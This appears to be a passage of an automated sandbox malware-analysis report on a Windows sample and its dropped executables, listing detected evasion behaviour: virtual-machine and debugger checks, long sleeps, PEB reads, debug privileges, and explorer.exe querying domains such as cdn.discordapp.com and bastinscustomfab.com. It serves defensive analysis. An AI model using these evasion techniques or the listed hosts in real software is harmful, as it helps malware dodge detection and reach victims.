Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: fw8ex1BNek.exe, 00000000.00000002.427730534.0000000000827000.00000004.00000001.sdmp Binary or memory string: ASWHOOK
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\acgvitw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\acgvitw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\acgvitw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\acgvitw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\acgvitw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\acgvitw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\DB56.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6588 Thread sleep count: 565 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6592 Thread sleep count: 233 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6612 Thread sleep count: 370 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6612 Thread sleep time: -37000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6700 Thread sleep count: 423 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6776 Thread sleep count: 131 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6688 Thread sleep count: 237 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe TID: 4752 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 565 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 370 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 423 Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052FA538 rdtsc 17_2_052FA538
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000005.00000000.414901290.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.414837754.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: DB56.exe, 00000012.00000002.621782230.0000000000FF8000.00000004.00000020.sdmp Binary or memory string: VMware
Source: explorer.exe, 00000005.00000000.409676978.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.414837754.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.409676978.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.373755525.000000000461E000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mict
Source: explorer.exe, 00000005.00000000.395650395.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: DB56.exe, 00000012.00000002.621782230.0000000000FF8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: DB56.exe, 00000012.00000002.621782230.0000000000FF8000.00000004.00000020.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware2DTXZL_YWin32_VideoControllerNA9BZMXCVideoController120060621000000.000000-00048390441display.infMSBDA_EF1P2_2PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors5MV_TKNV
Source: explorer.exe, 00000005.00000000.395650395.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.414901290.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000005.00000000.389556354.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\fw8ex1BNek.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\fw8ex1BNek.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\acgvitw System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_73781BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 24_2_73781BFF
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0081A84E push dword ptr fs:[00000030h] 0_2_0081A84E
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007EA33E push dword ptr fs:[00000030h] 11_2_007EA33E
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02869B92 mov eax, dword ptr fs:[00000030h] 24_2_02869B92
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02868F69 mov eax, dword ptr fs:[00000030h] 24_2_02868F69
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028671B0 mov eax, dword ptr fs:[00000030h] 24_2_028671B0
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028689C9 mov eax, dword ptr fs:[00000030h] 24_2_028689C9
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\acgvitw Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052FA538 rdtsc 17_2_052FA538
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E0490 LdrInitializeThunk, 23_2_023E0490
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_0286A914 RtlAddVectoredExceptionHandler, 24_2_0286A914

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Domain query: www.bastinscustomfab.com
Source: C:\Windows\explorer.exe Domain query: rcacademy.at
Source: C:\Windows\explorer.exe Domain query: bastinscustomfab.com
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 4924.exe.5.dr Jump to dropped file